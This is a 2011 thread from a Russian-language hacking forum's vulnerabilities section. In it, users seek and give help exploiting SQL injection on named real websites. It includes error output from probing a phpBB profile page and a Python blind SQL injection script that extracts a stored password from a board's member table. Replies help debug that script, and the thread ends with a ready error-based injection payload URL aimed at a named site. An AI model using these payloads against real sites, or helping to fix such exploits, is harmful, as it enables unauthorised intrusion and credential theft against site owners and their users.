HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17321  
Старый 15.06.2011, 23:41
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
 
Ответить с цитированием

  #17322  
Старый 15.06.2011, 23:45
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
Там нет скули.
 
Ответить с цитированием

  #17323  
Старый 15.06.2011, 23:48
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Там нет скули.
какето?

http://uzmob.uz/profile.php?mode=viewprofile&u=692'

Could not update user data.

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3

UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =

Line : 27

File : usercp_viewprofile.php
 
Ответить с цитированием

  #17324  
Старый 16.06.2011, 00:00
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
какето?
http://uzmob.uz/profile.php?mode=viewprofile&u=692'
Could not update user data.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id =
Line : 27
File : usercp_viewprofile.php
Это не значит, что там есть скуля
 
Ответить с цитированием

  #17325  
Старый 16.06.2011, 02:05
Ups
Guest
Сообщений: n/a
Провел на форуме:
42754

Репутация: 0
По умолчанию

Не могу запустить сплойт.

Код:
Code:
#!/usr/bin/python
#-*- coding: utf-8 -*-
# coded by BlueH4G _http://blueh4g.org_
import urllib,re
from time import sleep
 
def main() :
 chk = re.compile("true_title")
 url_begin="
http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
 url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23"
 result="result : "
 for spos in range(1,14):
  ch=0
  for i in range(1,8) :
   sleep(0.05)
 
 query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
   data=urllib.urlopen(url_begin + query + url_end)
   text=data.read()
   if chk.search(text) :
    ch += 2**(7-i)
  result+=chr(ch)
 print result
main()
C:\Python27>root.py

File "C:\Python27\root.py", line 9

url_begin="

^

SyntaxError: EOL while scanning string literal
 
Ответить с цитированием

  #17326  
Старый 16.06.2011, 02:28
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Цитата:
Сообщение от Ups  
Ups said:
Не могу запустить сплойт.
Код:
Code:
#!/usr/bin/python
#-*- coding: utf-8 -*-
# coded by BlueH4G _http://blueh4g.org_
import urllib,re
from time import sleep
 
def main() :
 chk = re.compile("true_title")
 url_begin="
http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20("
 url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23"
 result="result : "
 for spos in range(1,14):
  ch=0
  for i in range(1,8) :
   sleep(0.05)
 
 query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1
   data=urllib.urlopen(url_begin + query + url_end)
   text=data.read()
   if chk.search(text) :
    ch += 2**(7-i)
  result+=chr(ch)
 print result
main()
C:\Python27>root.py
File "C:\Python27\root.py", line 9
url_begin="
^
SyntaxError: EOL while scanning string literal
попробуй так url_begin="ссылко" или url_begin=" "

или ваще убери "
 
Ответить с цитированием

  #17327  
Старый 16.06.2011, 04:50
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ups  
Ups said:
Код:
Code:
C:\Python27>root.py
  File "C:\Python27\root.py", line 17
    query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",
1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%
200,1),"+str(i)+",1)=1

                     ^
SyntaxError: EOL while scanning string literal
привет, дружище) расскажи в общих словах почему ты даже не удосужился поискать в поисковой системе google по коду ошибки?

На твой взгляд что значит аббревиатура EOL?
 
Ответить с цитированием

  #17328  
Старый 16.06.2011, 12:18
Ups
Guest
Сообщений: n/a
Провел на форуме:
42754

Репутация: 0
По умолчанию

Гуглил, но не понял как решить проблему.
 
Ответить с цитированием

  #17329  
Старый 16.06.2011, 14:42
kroŧ
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830

Репутация: 4
По умолчанию

Как это раскрутить

http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33
 
Ответить с цитированием

  #17330  
Старый 16.06.2011, 14:44
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Error Based же:

http://www.onradio.gr/play_old.php?id=245%20or%201%20group%20by%20concat (version(),floor(rand(0)*2))%20having%20min(0)%20o r%201%20--%20-
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ